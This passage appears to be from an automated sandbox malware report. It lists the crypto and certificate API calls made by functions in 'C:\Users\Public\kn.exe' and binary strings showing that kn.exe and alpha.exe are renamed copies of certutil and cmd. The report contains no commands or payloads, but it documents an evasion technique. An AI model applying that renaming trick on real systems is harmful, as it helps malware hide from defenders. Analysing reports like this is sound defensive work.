Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD88B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF7FD88B980
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF7FD81597C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF7FD7C7988
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD825CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF7FD825CE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF7FD7CFC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7EFC34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF7FD895C54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF7FD7D1C50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD7E3C60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD821C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF7FD821C84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD795BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD795BA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF7FD7B9BC8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD83BBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD833BEB
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF7FD83FB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7FBB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF7FD86BB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD865B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF7FD865B44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF7FD867B60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895B90 CryptDecodeObjectEx,memmove,7_2_00007FF7FD895B90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF7FD7BBB80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF7FD85FB94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD7E76B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF7FD84D6A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8336E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD8336E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF7FD81F6D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BF630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF7FD7BF630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F650 CryptHashCertificate2,SetLastError,7_2_00007FF7FD85F650
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF7FD833654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD82F644
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BD660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF7FD7A5664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF7FD80366C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF7FD81B664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD859688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF7FD859688
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7BD5C2
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF7FD7F55F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8195FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF7FD8195FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF7FD7FB55C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F570 CryptHashCertificate,SetLastError,7_2_00007FF7FD85F570
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD833590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD869580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF7FD869580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD8698B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF7FD81B8D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8018DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD8018DC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF7FD7A38FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF7FD830844
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8307A4 BCryptDestroyHash,#205,#357,7_2_00007FF7FD8307A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8407D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD8407D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8227BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD8227BC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7967CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7967CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD81C7F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8307F4 BCryptDestroyKey,#205,#357,7_2_00007FF7FD8307F4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF7FD868814
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD822724 CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD822724
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF7FD830740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD86A740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF7FD868298
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF7FD89A2E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF7FD7D0300
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD85E274
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD806280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD806280
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD852278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF7FD852278
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D21A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF7FD7D21A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8561AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF7FD8561AC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF7FD81A1E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD896214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF7FD896214
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD82E1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF7FD86A1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89613C CryptDecodeObjectEx,7_2_00007FF7FD89613C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F417C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD816194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD816194
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8024D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF7FD8024D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7A44E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD85E516
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF7FD7BC514
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF7FD80A450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF7FD80C450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD828488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD828488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BE3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF7FD7BE3B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF7FD7D23E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7B4410
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF7FD868404
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD826374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF7FD826374
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD822358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF7FD822358
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
